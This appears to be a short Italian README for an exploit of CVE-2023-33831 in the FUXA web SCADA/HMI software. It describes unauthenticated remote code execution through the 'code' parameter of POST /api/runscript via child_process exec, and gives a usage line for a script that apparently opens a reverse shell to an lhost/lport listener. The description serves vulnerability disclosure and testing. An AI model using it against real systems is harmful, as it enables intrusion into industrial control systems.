
Descrizione ed exploit della CVE-2023-33831 che affligge il software FUXA per la visualizzazione dei processi basato sul web (SCADA/HMI/Dashboard).
La vulnerabilità colpisce il componente di scripting di FUXA, a causa della mancanza di controllo o sanitizzazione sugli input che possono essere controllati dagli utenti, consentendo così l'uso di metodi pericolosi che possono essere sfruttati per l'esecuzione di codice in remoto. Il percorso interessato è /api/runscript, dove è possibile eseguire comandi senza essere autenticati attraverso il parametro code con il metodo POST, utilizzando il modulo child_process tramite la funzione exec.
python CVE-2023-33831.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>